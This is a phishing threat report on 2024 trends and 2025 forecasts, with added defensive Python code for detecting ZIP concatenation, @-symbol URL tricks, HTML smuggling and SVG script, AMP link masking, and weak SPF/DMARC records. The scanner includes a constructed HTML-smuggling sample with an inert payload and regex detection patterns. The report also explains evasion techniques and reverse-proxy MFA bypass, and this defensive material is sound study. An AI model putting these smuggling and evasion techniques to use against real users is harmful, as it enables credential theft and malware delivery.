As in previous years, archive files (32%) remained one of the most frequently used attachment formats in 2024. According to statistics from PT Sandbox, archive files accounted for 38% of detected malicious files in Russia, making them the most common threat. However, due to the longstanding focus on defending against malicious archives, only 5% of archive-based attacks now reach end users unaltered, according to PT Knockin. To bypass file scanning, attackers employ techniques such as encrypting archives with passwords (often included in the email body). For example, the PhaseShifters group used this approach. Additionally, attackers are constantly experimenting with new methods. In 2024, researchers at Perception Point identified a new bypass technique involving ZIP archive concatenation, where attackers create several separate archives, with one containing the malicious payload while the others remain empty or are filled with harmless files. Similar to a Matryoshka doll, the archives are appended one after another into a single file that contains multiple complete ZIP structures, each with its own central directory. ZIP readers disagree on which one is authoritative: some parse from the start of the file, others from the end-of-central-directory record at its end, so a scanner may see only the harmless archive while the victim's extractor opens the malicious one.
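ZIP concatenation reproduced and then detected, as an added example (not code from the report or from Perception Point). Two archives are written back to back; Python's zipfile, which like several extractors trusts only the final end-of-central-directory record, lists just the second archive, while a scanner that walks every central directory, or cuts the file at each end-of-central-directory record and opens each piece, sees both. The archive contents are constructed stubs.

```python
import io
import struct
import zipfile

CDH_SIG = b"PK\x01\x02"   # central directory file header
EOCD_SIG = b"PK\x05\x06"  # end of central directory record


def make_zip(entries):
    """Build a ZIP in memory from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def concatenated_sample():
    """Malicious archive first, harmless decoy last (both contents are constructed stubs)."""
    first = make_zip({"invoice.pdf.exe": b"MZ constructed payload stub, not a real binary"})
    second = make_zip({"invoice.pdf": b"%PDF-1.4 constructed decoy document"})
    return first + second


def names_last_archive_only(blob):
    """What an EOCD-driven reader reports: only the final archive's entries."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.namelist()


def names_all_central_directories(blob):
    """Walk every central-directory header in the file, whichever archive it belongs to.
    (A stored file whose data happens to contain the signature would add a false entry;
    split_archives() below is the stricter approach.)"""
    names, pos = [], 0
    while (pos := blob.find(CDH_SIG, pos)) != -1 and pos + 46 <= len(blob):
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", blob, pos + 28)
        names.append(blob[pos + 46:pos + 46 + name_len].decode("utf-8", "replace"))
        pos += 46 + name_len + extra_len + comment_len
    return names


def split_archives(blob):
    """Cut the blob after every EOCD record so each embedded archive can be opened alone."""
    pieces, start, pos = [], 0, 0
    while (pos := blob.find(EOCD_SIG, pos)) != -1 and pos + 22 <= len(blob):
        comment_len = struct.unpack_from("<H", blob, pos + 20)[0]
        end = pos + 22 + comment_len
        pieces.append(blob[start:end])
        start = pos = end
    return pieces


def is_concatenated(blob):
    return len(split_archives(blob)) > 1


def names_per_archive(blob):
    return [names_last_archive_only(piece) for piece in split_archives(blob)]


if __name__ == "__main__":
    blob = concatenated_sample()
    print(names_last_archive_only(blob))        # ['invoice.pdf']
    print(names_all_central_directories(blob))  # ['invoice.pdf.exe', 'invoice.pdf']
    print(names_per_archive(blob))              # [['invoice.pdf.exe'], ['invoice.pdf']]
```

A gateway that unpacks with a single library and scans what it returns inherits that library's choice of archive. Treating more than one end-of-central-directory record as a blocking condition is simpler and safer than trying to scan every interpretation.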
In the course of daily work, people frequently handle PDF files and office documents, such as word-processing files, spreadsheets, and presentations. These files often appear harmless, which is why cybercriminals frequently use them in attacks (27% of malicious campaigns). Data from PT Sandbox shows that 14% of all detected malicious files were either PDFs or office documents. Similarly, PT Knockin reports that attackers successfully deliver 37% of these files by employing a variety of techniques to evade detection. One method observed in 2024 involved the use of deliberately corrupted Word documents as part of campaigns to distribute malicious QR codes. Attackers also continue to use older formats like RTF. For example, in March 2024, researchers documented 6,755 attacks using RTF files. In this campaign, attackers used a URL obfuscation trick involving the @ symbol. Consider the link https://microsoft[.]com@attacker[.]com/: at first glance it appears to lead to microsoft[.]com, but in a URL everything between // and @ is treated as user credentials (userinfo), not as the host, so the browser requests attacker[.]com and ignores the "microsoft.com" prefix. Another popular file type used by attackers in 2024 was OneNote. Researchers at Unit 42 analyzed over 6,000 samples of malicious OneNote files, which were used to deliver not only script-based downloaders but also executable files.
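The @ trick resolved the way a URL parser does, as an added example (not from the report): everything between // and @ is userinfo, and the host is whatever follows. The URLs are constructed and use example and .invalid names.

```python
from urllib.parse import urlsplit


def real_destination(url):
    """Where the request actually goes, per the URL's authority component."""
    p = urlsplit(url)
    return {"scheme": p.scheme, "host": (p.hostname or "").lower(), "userinfo": p.username}


def belongs_to(host, brand_domain):
    """True only for the domain itself or a genuine subdomain (label boundary enforced)."""
    host, brand_domain = host.lower().rstrip("."), brand_domain.lower()
    return host == brand_domain or host.endswith("." + brand_domain)


def audit_link(url, expected_brand):
    """Findings a gateway would raise for a link that claims to lead to expected_brand."""
    d = real_destination(url)
    findings = []
    if d["userinfo"] is not None:
        findings.append(f"userinfo '{d['userinfo']}' before '@' is not the host; "
                        f"request goes to {d['host']}")
    if not belongs_to(d["host"], expected_brand):
        findings.append(f"host {d['host']} is not under {expected_brand}")
    if d["scheme"] not in ("http", "https"):
        findings.append(f"unexpected scheme {d['scheme']}")
    return findings


# Constructed links: the @ trick, a subdomain look-alike, and a genuine brand link.
LINKS = [
    "https://microsoft.com@attacker.example/login",
    "https://login.microsoft.com.attacker.example/",
    "https://www.microsoft.com/",
]

if __name__ == "__main__":
    for link in LINKS:
        print(link, "->", real_destination(link)["host"], audit_link(link, "microsoft.com"))
```

The same check also catches the subdomain look-alike, which has no @ at all: `endswith("." + brand)` accepts login.microsoft.com but rejects login.microsoft.com.attacker.example, where the brand is merely a label in the middle of the name.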
Executable files are widely recognized as a major security risk—and for good reason: 35% of all malicious files detected by PT Sandbox fall into this category. However, modern security tools have become remarkably effective at detecting and blocking them. According to PT Knockin, only 7% of executable files now reach end users. As a result, attackers have largely abandoned this approach, with executables accounting for just 1% of all malicious email attachments.
One of the most notable changes compared to the previous period was the growing use of static web pages in phishing attacks. These pages are now as commonly used as archive files, making up 32% of malicious content. Static web pages are highly versatile, allowing attackers to host credential-stealing forms or distribute malware. According to PT Knockin, 9% of these files reach end users. To bypass security checks, attackers use evasion techniques like HTML Smuggling.11 This method bypassed secure email gateways in 16.2% of cases during the first quarter of 2024, according to a report by Egress. Notably, attackers started employing GenAI to write HTML files using this technique. Cybercriminals are also developing and selling specialized tools that transform malicious HTML into forms that are even more difficult for security systems to recognize.
Another tactic gaining traction is the use of images as malicious attachments (16% of cases). Malicious code or clickable links can be embedded within an image file, often without arousing user suspicion. For instance, attackers used SVG attachments to display HTML and execute JavaScript when the image is loaded, creating fake forms to steal user credentials.
- An attack method where malicious payloads are embedded in HTML attachments.
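An added example (not from the report) of a static triage pass over HTML and SVG attachments for the traits just described: client-side blob assembly and forced downloads that characterize HTML smuggling, and script or event handlers inside an SVG. The patterns are heuristics, and the three sample attachments are constructed inline.

```python
import base64
import re

# Client-side download assembly markers typical of HTML smuggling (heuristics, not signatures).
SMUGGLING_PATTERNS = {
    "base64-decode": re.compile(r"\batob\s*\(", re.I),
    "blob-object": re.compile(r"new\s+Blob\s*\(", re.I),
    "object-url": re.compile(r"URL\.createObjectURL\s*\(", re.I),
    "legacy-save": re.compile(r"msSaveOrOpenBlob", re.I),
    "forced-download": re.compile(r"\.download\s*=|\bdownload\s*=\s*['\"]", re.I),
    "auto-click": re.compile(r"\.click\s*\(\s*\)", re.I),
}
# Active content inside an SVG, as in the fake-form lure described above.
SVG_PATTERNS = {
    "svg-script": re.compile(r"<svg\b[^>]*>.*?<script\b", re.I | re.S),
    "svg-event-handler": re.compile(r"<svg\b[^>]*\son\w+\s*=", re.I),
    "svg-foreignobject": re.compile(r"<foreignObject\b", re.I),
}
LONG_BASE64 = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
MAGIC = ((b"MZ", "pe"), (b"PK\x03\x04", "zip"), (b"%PDF", "pdf"), (b"\x7fELF", "elf"))


def sniff(raw: bytes) -> str:
    """Guess the file type of a decoded blob from its leading bytes."""
    for magic, kind in MAGIC:
        if raw.startswith(magic):
            return kind
    return "unknown"


def decoded_blobs(html: str) -> list:
    """Decode every long base64 run in the page and report what each looks like."""
    kinds = []
    for blob in LONG_BASE64.findall(html):
        padded = blob + "=" * (-len(blob) % 4)
        try:
            kinds.append(sniff(base64.b64decode(padded)))
        except ValueError:  # not base64 after all
            continue
    return kinds


def scan_html_attachment(html: str) -> dict:
    """Static verdict for one HTML/SVG attachment body."""
    indicators = [n for n, pat in SMUGGLING_PATTERNS.items() if pat.search(html)]
    svg_indicators = [n for n, pat in SVG_PATTERNS.items() if pat.search(html)]
    embedded = decoded_blobs(html)
    carries_payload = any(kind != "unknown" for kind in embedded)
    suspicious = len(indicators) >= 2 or bool(svg_indicators) or carries_payload
    return {"indicators": indicators, "svg_indicators": svg_indicators,
            "embedded": embedded, "verdict": "suspicious" if suspicious else "clean"}


# Constructed samples (not real malware): the smuggled 'payload' is just a ZIP local
# header followed by zeros, and the SVG runs script on load.
_FAKE_ZIP_B64 = base64.b64encode(b"PK\x03\x04" + b"\x00" * 180).decode()
SAMPLE_SMUGGLED = f"""<html><body><script>
var b = atob("{_FAKE_ZIP_B64}");
var bytes = new Uint8Array(b.length);
for (var i = 0; i < b.length; i++) bytes[i] = b.charCodeAt(i);
var blob = new Blob([bytes], {{type: "application/octet-stream"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob); a.download = "invoice.zip"; a.click();
</script></body></html>"""
SAMPLE_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" onload="init()">'
              '<script>function init(){ /* draws a fake login form */ }</script></svg>')
SAMPLE_BENIGN = "<html><body><p>Meeting notes attached as PDF.</p></body></html>"

if __name__ == "__main__":
    for sample in (SAMPLE_SMUGGLED, SAMPLE_SVG, SAMPLE_BENIGN):
        print(scan_html_attachment(sample))
```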
To identify the file types most likely to evade security measures, researchers analyzed data from PT Knockin, a corporate email security tool. PT Knockin reports track whether emails contain malicious attachments, and if so, whether they are original or changed. Only emails that bypassed security systems entirely—arriving in their original, unaltered form—were considered, as they pose the greatest potential risk.
Figure 12. Types of malicious payloads most frequently reaching end users (source: PT Knockin reports, percentage of incidents in 2024)
Another critical layer of defense against malicious attacks is sandboxing technology. Sandboxing creates a virtual environment where files can be analyzed for suspicious behavior in isolation. Data from PT Sandbox, a solution developed by Positive Technologies that is particularly effective at uncovering complex and previously unknown threats, was used to identify the types of files most frequently flagged as malicious.
Figure 13. Types of malicious payloads most frequently identified as harmful (source: PT Sandbox, percentage of incidents in 2024).
In 2025, archives will remain one of the most commonly used types of malicious payloads. However, as this format becomes increasingly difficult to deliver in its original form, attackers will continue experimenting with new evasion methods, such as ZIP concatenation—a technique where multiple archives are layered to conceal malicious content. Due to their versatility and effectiveness at evading detection, static web pages are likely to remain the second most popular type of attachment. Closing out the top three will be PDF files and office documents.
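A static check for the ZIP concatenation technique just mentioned, as an added example that is not from the report: it walks every local file header in the blob instead of trusting the single central directory an unarchiver picks, so the entries of a second, appended archive become visible. Both archives are constructed in memory.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"   # end-of-central-directory record, one per archive
LOCAL_SIG = b"PK\x03\x04"  # local file header, one per stored entry


def local_header_names(data: bytes) -> list:
    """Names found by walking every local file header signature in the blob.

    Unarchivers read only one central directory (the last or the first one,
    depending on the tool), so this sees entries from every concatenated archive.
    Heuristic: a data stream that happens to contain the signature bytes would
    add a bogus name.
    """
    names = []
    pos = data.find(LOCAL_SIG)
    while pos != -1:
        if pos + 30 <= len(data):
            name_len, _extra_len = struct.unpack_from("<HH", data, pos + 26)
            names.append(data[pos + 30:pos + 30 + name_len].decode("utf-8", "replace"))
        pos = data.find(LOCAL_SIG, pos + 4)
    return names


def analyze_zip(data: bytes) -> dict:
    """Compare what zipfile (which trusts the last central directory) shows
    against what is physically present in the file."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        visible = zf.namelist()
    everything = local_header_names(data)
    hidden = [name for name in everything if name not in visible]
    eocd_records = data.count(EOCD_SIG)
    return {"eocd_records": eocd_records, "visible": visible, "hidden": hidden,
            "concatenated": eocd_records > 1 or bool(hidden)}


def make_zip(entries: dict) -> bytes:
    """Build a small stored (uncompressed) archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: a harmless archive with a second archive appended to it.
BENIGN_ZIP = make_zip({"readme.txt": b"Quarterly figures attached."})
APPENDED_ZIP = make_zip({"invoice.lnk": b"placeholder bytes, not a real shortcut"})
CONCATENATED_ZIP = BENIGN_ZIP + APPENDED_ZIP

if __name__ == "__main__":
    print(analyze_zip(BENIGN_ZIP))
    print(analyze_zip(CONCATENATED_ZIP))
```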
Forecast 11. Trusted services will be increasingly used in phishing attacks
To distribute malicious links, attackers increasingly rely on evasion techniques that involve legitimate services and websites. This approach helps avoid suspicion among users and allows attackers to hide within the massive volume of legitimate web traffic. Known as Living Off Trusted Sites (LOTS), this technique builds on the principles of Living off the Land (LoTL), which uses standard tools like PowerShell and WMI in cyberattacks. In the context of LOTS, attackers exploit trusted, popular services and platforms. According to a report by Abnormal Security, the use of such websites in phishing attacks—a common LOTS tactic—rose by 350% between June 2023 and July 2024.
In 2024, the top three trusted services exploited in LOTS-based phishing campaigns were Google, Microsoft, and GitHub. Among Microsoft and Google services, cloud storage platforms like OneDrive and Google Drive were especially popular. For example, these platforms were used in phishing campaigns by groups like Earth Kasha and Earth Preta.
Figure 14. Most used service providers for LOTS in phishing attachments (percentage of incidents in 2024)
GitHub was also widely abused, and attackers didn't even need to create their own malicious repositories. In one such case, they uploaded malware directly into the comments sections of legitimate repositories. These repositories belonged to tax organizations, including UsTaxes, HMRC, and Inland Revenue. Attackers lured victims via email, providing links to download the malicious content.
In Russia, a similar tactic was observed with Yandex Disk, which was used by the TaxOff group (discovered by PT ESC experts) to distribute malicious content, including the Unicorn malware.
Trusted services can also be used as phishing lures. For example, in December 2024, attackers exploited Google Calendar to send meeting invitations embedded with links leading to Google Forms or Google Drawings. These links redirected users to phishing sites, often disguised as reCAPTCHA pages or support buttons. Attackers could double the number of phishing messages by canceling a "meeting" in Google Calendar and including a follow-up message with another phishing link.
Attackers also integrate technologies provided by trusted services into their campaigns. For instance, in 2024, Egress reported a surge in the use of AMP12 technology to mask malicious links. While this technique first appeared in 2023, its use declined initially, but saw a steady resurgence from May to October 2024, growing by 7% during that period. This method bypasses link previews by showing users a legitimate URL (Google or TikTok), while actually redirecting them to a malicious website. It also helps evade URL scanning systems, as the initial link appears trustworthy.

Given the 2024 trends, the use of trusted services in phishing attacks is expected to grow in 2025, both for delivering and hosting malicious content and as phishing bait.
- A technology that speeds up the loading of web pages on mobile devices.
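The AMP link masking described above, as an added example that is not from the report: it unwraps the Google AMP viewer form (assumed here to be https://www.google.com/amp/[s/]host/path; the TikTok variant is not handled) and shows the host a link preview displays beside the host the user actually reaches. Sample URLs are constructed.

```python
from urllib.parse import urlsplit

# Assumption: only Google's AMP viewer prefix is handled.
AMP_VIEWER_HOSTS = {"google.com", "www.google.com"}


def unwrap_amp(url: str):
    """Return the URL hidden inside a Google AMP viewer link, or None if it is not one."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host not in AMP_VIEWER_HOSTS or not parts.path.startswith("/amp/"):
        return None
    rest = parts.path[len("/amp/"):]
    scheme = "http"
    if rest.startswith("s/"):          # 's/' marks an https origin
        scheme, rest = "https", rest[2:]
    inner_host, _, inner_path = rest.partition("/")
    if not inner_host:
        return None
    inner = f"{scheme}://{inner_host}/{inner_path}"
    return inner + (f"?{parts.query}" if parts.query else "")


def final_destination(url: str) -> str:
    """Follow nested AMP wrappers (bounded) until a non-AMP URL remains."""
    for _ in range(5):
        inner = unwrap_amp(url)
        if inner is None:
            break
        url = inner
    return url


def preview_vs_reality(url: str) -> dict:
    """What a link preview shows (the wrapper's host) versus where the user ends up."""
    shown = (urlsplit(url).hostname or "").lower()
    real = final_destination(url)
    return {"shown_host": shown, "real_url": real,
            "real_host": (urlsplit(real).hostname or "").lower(),
            "wrapped": real != url}


if __name__ == "__main__":
    # Constructed sample: a trusted-looking wrapper around an unrelated host.
    print(preview_vs_reality("https://www.google.com/amp/s/login-portal.example/verify"))
```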
Forecast 12. Phishers will focus on data theft and long-term reconnaissance
In 2024, phishing attacks focused on malware infection (63%) and credential theft (35%).
Figure 16. Types of distributed attachments (percentage of incidents in 2024)
Credential-stealing forms remain a simple yet effective way to gain access to victim accounts. There are several reasons for criminals' interest in credentials:
- High demand on underground markets: stolen credentials are highly sought after by initial access brokers, who sell them on dark web marketplaces. According to our research, 31% of credentials sold on the dark web fall within a price range of $1,000 to $5,000, while 7% are priced even higher—over $5,000. Researchers at CYJAX also observed a steady rise in these prices each quarter.
- Facilitating further attacks: stolen credentials are often used as a gateway for launching more advanced cyberattacks. For instance, in one case documented by Proofpoint Threat Research, attackers sent SMS messages containing links to fake Microsoft login pages, customized with the branding of the targeted organization. These pages guided users through a multifactor authentication (MFA) process, allowing attackers to capture their credentials. Once the accounts were compromised, the attackers worked to maintain long-term access by performing actions to conceal their activity. Ultimately, they used these accounts to access business applications and create fraudulent gift cards.
Forms for stealing credentials most often mimic email login portals, which account for 56% of phishing campaigns. Among these, Office365 is the most common target, as Outlook alone represents about 38% of the corporate email market. A notable example of this was a phishing campaign uncovered by Unit 42, in which attackers successfully compromised the credentials of around 20,000 users from various European companies. By gaining access to these accounts, the attackers infiltrated the organizations' Azure cloud infrastructure and added new devices to the compromised accounts to maintain control.
In 39% of phishing campaigns, attackers targeted credentials for portals belonging to specific organizations. For example, Resilience reported a phishing campaign by the Kimsuky APT group targeting university staff, researchers, and professors in South Korea. The attackers used compromised websites to host a web shell called Green Dinosaur, which enabled them to upload phishing pages. These pages were created by scraping13 legitimate login portals and were designed to steal user credentials. Researchers reported that the main goal of this campaign was to gather intelligence.
- A method of extracting web data from web pages. While it can be done manually, it is usually performed using code that sends GET requests to the target website.
Figure 17. Types of login forms (percentage of incidents in 2024)
Although credential theft has become more prominent, the primary goal in phishing attacks remains the delivery of malware. Malware enables attackers to steal sensitive information, disrupt systems, or conduct prolonged espionage. The most commonly used malware types in 2024 were ransomware (41%), Remote Access Trojans (RATs) (34%), and spyware (24%), which aligns with the global trend.
Figure 18. Types of distributed malware (percentage of incidents)
In 2024, the use of ransomware in phishing campaigns dropped by 15%, while the deployment of RATs increased by 14%. This trend wasn't limited to phishing campaigns; it was evident across the broader threat landscape, starting in the first quarter of 2024. The growing popularity of RATs among attackers can be explained by their versatility. These tools allow cybercriminals to collect data, monitor and control victims' systems, and conduct reconnaissance for extended periods—all while staying under the radar. The most commonly used tools in phishing campaigns in 2024 were Remcos RAT, SparkRAT, and AsyncRAT. For example, in January 2024, experts at PT ESC uncovered a phishing campaign where attackers distributed a malicious PDF file disguised as a SWIFT payment document. The PDF contained a VBS macro that ultimately resulted in the installation of Remcos RAT on the victim's system.

In 2024, spyware fell to third place among the most frequently used types of malware, although its share in phishing attacks remained stable. The most prominent spyware tools in attackers' arsenals included Lumma Stealer, Meta Stealer, and RedLine Stealer. One campaign analyzed by PT ESC targeted organizations with Lumma Stealer and NetSupport RAT. Attackers sent malicious LNK and DOCX files, which, when opened, triggered the download of malware from GitHub repositories or command-and-control servers. The attackers also invested heavily in obfuscating Lumma Stealer, making it detectable by only three antivirus engines on VirusTotal.

The noticeable shift in attackers' strategies suggests that 2025 will bring a greater focus on long-term reconnaissance, data theft, and the resale of stolen access. This shift is also being adopted by ransomware groups, who are increasingly using an exfiltration-first approach. With this method, attackers steal sensitive data before encrypting systems, allowing them to demand ransom for both file decryption and preventing the release of stolen information. The emergence of hybrid malware, such as Crystal Rans0m and Luxy, highlights this trend.
Popular themes in phishing attacks
As we've previously discussed, phishing relies heavily on psychological manipulation. Attackers need to persuade their victims to open malicious emails, click on links, or take other unsafe actions. To achieve this, they often use themes designed to provoke a strong emotional response, exploiting fear, urgency, greed, or other emotions.
One of the most common phishing strategies remains sending emails related to the recipient's work. These include messages that appear to come from contractors, employers, job applicants, and other professional contacts. For example, the SideWinder APT group conducted a phishing campaign that used fake emails about employee terminations, preying on victims' anxiety.

In 2024, phishing emails that appeared to come from HR or IT departments were particularly popular. Research from KnowBe4 found that emails from HR and IT teams were the most frequently clicked in phishing simulation tests during the first, second, and third quarters of 2024. Work-related themes are so popular because they are relevant to almost any organization and often seem routine, making them less likely to raise suspicion.
Messages impersonating government agencies are another staple in phishing campaigns. These emails manipulate fear and urgency, using the authority of the sender to pressure victims into action. For instance, PT ESC experts uncovered a phishing email purportedly from the FSTEC of Russia's Northwestern Federal District. This email was part of a multistage phishing attack. The initial email contained a low-quality PDF scan of an official-looking FSTEC letter. While the document itself wasn't malicious, its poor quality made it unusable, compelling the recipient to initiate a conversation with the sender. The attackers then sent an "improved" version of the document—a file disguised as a PDF but actually an executable. Once opened, it enabled a remote access session for the attackers.

Messages that appear to come from well-known companies are also widely used in phishing attacks. Attackers exploit the trust victims place in these organizations to make their emails more convincing. For example, cybercriminals impersonated DocuSign, a popular electronic document signing platform. Victims received emails prompting them to complete a standard DocuSign procedure by clicking a link to view and sign a document. However, the link redirected victims to a phishing website designed to steal their login credentials. Interestingly, this particular campaign specifically targeted mobile devices. If the malicious link was opened on a desktop, the user was redirected to legitimate websites.


Attackers are always quick to pick up on the latest news and trends, weaving current events into their phishing campaigns. These can range from regularly scheduled events that everyone knows about, to breaking news that grabs widespread attention.
These events give attackers the chance to plan their campaigns in advance and craft highly convincing content. For example, they prepare each year for holiday shopping seasons, year-end deadlines, or Black Friday. Alongside these recurring events, they also take advantage of major news stories, such as political developments, sports events, conferences, and product launches. One such example involved the Earth Lusca APT group, which used documents referencing China-Taiwan relations as bait to deliver malware. This operation coincided with the Taiwanese elections and ran from late December 2023 through January 2024.
Phishing campaigns are also heavily influenced by "black swan" events—rare, unexpected incidents that are hard to predict but create widespread panic and anxiety. These situations provide attackers with ideal conditions to exploit their victims. One such event in 2024 was the global CrowdStrike outage, which disrupted 8.5 million Windows devices worldwide. Just days after the incident, phishing emails began appearing, disguised as recovery instructions from Microsoft. Another example, documented by PT ESC in August, involved attackers exploiting a newly issued municipal legal act. The document failed to display correctly, prompting victims to click the "Enable content" button to fix the issue. This action triggered embedded macros.

The PhaaS market
The evolution of the dark web has turned cybercrime into a commodity, allowing even the least skilled attackers to gain access to organizational infrastructure with minimal effort. Phishing attacks, in particular, are traditionally time- and resource-intensive for attackers—but this challenge has been addressed by Phishing-as-a-Service (PhaaS) platforms. These platforms offer ready-made phishing campaigns, with prices starting as low as $10.

PhaaS platforms typically provide the following features:
- Phishing templates for mimicking the websites of various organizations. For instance, one of the new solutions in 2024 was the Sniper Dz platform.
- Tools for generating or cloning websites.
- Multifactor authentication (MFA) bypass.
- CAPTCHA integration.
- Various detection evasion techniques.
- Mass email distribution.
- Help and support services.
- Dashboards with phishing campaign metrics.
Forecast 13. Tools for bypassing MFA will remain in high demand among attackers
Among the most popular PhaaS (Phishing-as-a-Service) tools are reverse-proxy solutions, which enable attackers to bypass multifactor authentication (MFA). In a traditional phishing attack, cybercriminals create a fake website with a fraudulent login page. The victim enters their credentials, is redirected to the legitimate site, and attackers use the stolen information for their purposes. Reverse-proxy tools, however, are more intricate. Instead of a static clone of the target website, attackers act as intermediaries between the legitimate site and the victim. Here's how it works: the victim sends their credentials to the attackers' reverse-proxy server. The attackers forward this request to the legitimate website. The website responds to the reverse proxy, which then forwards the content back to the victim. When the victim enters their MFA code, the proxy server intercepts this information and relays it to the website. By intercepting MFA codes at the time of login, attackers gain access to the victim's account.
The dark web offers a variety of reverse-proxy solutions, many of which come with additional functionality. Tycoon 2FA and Mamba 2FA provide phishing templates and ready-to-use decoy documents. Tycoon 2FA also includes a real-time dashboard displaying metrics such as the number of blocked bots, successful logins, stolen credentials, and their details. Many of these platforms integrate CAPTCHA to evade automatic analysis and use IP proxies to hide the hosting provider's origin. Tools like ONNX Store take it a step further by using encrypted JavaScript code, which is decrypted only when the page loads. This adds an extra layer of obfuscation to bypass detection. Most of these services operate on a subscription basis, with an average price of around $250.

There are also open-source solutions available on platforms like GitHub. One of the most popular among them is Evilginx, which relies on small configuration files called phishlets. Setting up a phishlet can cost approximately $200, though many pre-made phishlets, along with guides for creating them, are readily available on dark web forums.

Evilginx itself is not particularly user-friendly, especially for beginners. Its developers even created a paid training course to help users set it up. However, in October 2024, this course started circulating for free on dark web forums.

According to JumpCloud, 87% of companies with over 10,000 employees and 78% of companies with 1,001–10,000 employees use MFA. Research by Okta also indicates that MFA adoption continues to grow. As more organizations implement MFA, phishing attacks designed to bypass it will only increase in frequency. The growing demand for MFA bypass tools creates a corresponding supply, and these solutions remain widely available on the dark web. The release of the Evilginx training course for free is likely to lead to a rise in its use, particularly among less experienced attackers.
Forecast 14. The hunt for IT specialists will continue
One of the most dangerous phishing tools to emerge in 2024 was GoIssue. This tool enables attackers to automatically extract email addresses from GitHub profiles and send out mass phishing campaigns. For example, attackers can use fake GitHub notification emails, impersonating security staff or recruiters. GoIssue streamlines the phishing process, making it more efficient and automated. The emergence of GoIssue aligns closely with the growing trend of targeting developers. Developers can serve as critical initial access points not only for attacks on individual organizations but also on broader supply chains. This trend is likely to continue into 2025.

Earlier, we predicted the increased use of AI and deepfakes in phishing attacks. The release of DarkGPT on cybercriminal forums in December 2024 further reinforces this trend. DarkGPT is a tool designed to generate phishing emails and assist in planning phishing campaigns, significantly simplifying the work for attackers.

Additionally, advertisements for Deepfake-as-a-Service (DaaS) have begun appearing on dark web platforms. Attackers can also use open-source deepfake tools available on GitHub. The rise of DaaS offerings is another indication that the number of cybersecurity incidents involving deepfakes is likely to grow.

Conclusions
Phishing attacks will remain one of the most pressing cyberthreats for both organizations and individual users. Each year, these attacks become more sophisticated and harder to detect, demanding constant vigilance and attention to security measures. With the expansion of the dark web and the rise of PhaaS (Phishing-as-a-Service) platforms, the line between professional attackers and novices continues to blur—broadening the pool of potential cybercriminals. Phishing emails are becoming increasingly convincing, and the distinction between targeted and mass phishing is gradually fading.
At present, email remains the primary communication channel for phishing attacks, though attackers are increasingly combining it with other communication methods to improve their success rates. The goals of phishing campaigns have not changed: attackers still aim to distribute malware and steal credentials. When it comes to phishing themes, work-related topics remain the most commonly used by attackers. These topics are effective at grabbing employees' attention without raising suspicion. At the same time, attackers actively exploit themes tied to current global events. Psychological manipulation remains at the core of phishing, as it's the key to convincing users to take the desired action.
Attackers devote considerable effort to bypassing security measures. Despite the ongoing development of cybersecurity tools, phishing messages still manage to reach victims. This resembles a game of ping-pong: attackers discover loopholes, cybersecurity solutions close them, and the cycle begins again. As a result, in 2025–2026, attackers are expected to focus on increasing the technical complexity of their attacks.
How to protect against phishing attacks
Technical measures
To protect against phishing attacks—and cyberattacks in general—we recommend following our general guidelines on personal and corporate cybersecurity.
Since phishing attacks often start with email, securing your email system is essential. Use secure email gateway (SEG) solutions to block dangerous messages before they cause harm. Implement email authentication protocols like DKIM, DMARC, and SPF. Set up email filtering rules to flag or isolate messages with phishing traits. Regularly test your email security using dedicated services.
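An added example (not from the report) that checks SPF and DMARC TXT records for the settings that leave them ineffective, with a permissive and a hardened pair of constructed records for example.com.

```python
def parse_dmarc(record: str) -> dict:
    """Split 'v=DMARC1; p=none; rua=mailto:...' into a lower-cased tag dictionary."""
    tags = {}
    for part in record.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_spf(record: str) -> list:
    """Finding codes for an SPF TXT record; an empty list means no weakness found."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["not-spf"]
    findings, lookups, all_qualifier = [], 0, None
    for term in terms[1:]:
        t = term.lower()
        qualifier, mech = (t[0], t[1:]) if t[0] in "+-~?" else ("+", t)
        name = mech.split(":", 1)[0].split("/", 1)[0]
        if name == "all":
            all_qualifier = qualifier
        elif name in ("include", "a", "mx", "ptr", "exists") or mech.startswith("redirect="):
            lookups += 1                     # each costs a DNS lookup; RFC 7208 caps the total at 10
        if name == "ptr":
            findings.append("ptr-deprecated")
    if all_qualifier is None:
        findings.append("no-all")            # unlisted senders get 'neutral', not a fail
    elif all_qualifier == "+":
        findings.append("all-pass")          # '+all' lets any host send as the domain
    elif all_qualifier == "?":
        findings.append("all-neutral")       # '?all' is equivalent to no policy
    if lookups > 10:
        findings.append("too-many-lookups")  # evaluates to permerror, so SPF is ignored
    return findings


def assess_dmarc(record: str) -> list:
    """Finding codes for a DMARC TXT record; an empty list means no weakness found."""
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return ["not-dmarc"]
    findings = []
    policy = tags.get("p", "").lower()
    if not policy:
        findings.append("policy-missing")
    elif policy == "none":
        findings.append("policy-none")       # monitor only: spoofed mail is still delivered
    elif policy not in ("quarantine", "reject"):
        findings.append("policy-unknown")
    if "rua" not in tags:
        findings.append("no-aggregate-reports")
    if tags.get("pct", "100") != "100":
        findings.append("partial-enforcement")
    return findings


# Constructed records for example.com: a permissive pair beside a hardened pair.
WEAK_SPF = "v=spf1 a mx ptr include:_spf.example.com ?all"
STRONG_SPF = "v=spf1 include:_spf.example.com -all"
WEAK_DMARC = "v=DMARC1; p=none"
STRONG_DMARC = "v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com; pct=100"

if __name__ == "__main__":
    for rec in (WEAK_SPF, STRONG_SPF):
        print(rec, "->", assess_spf(rec) or "ok")
    for rec in (WEAK_DMARC, STRONG_DMARC):
        print(rec, "->", assess_dmarc(rec) or "ok")
```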
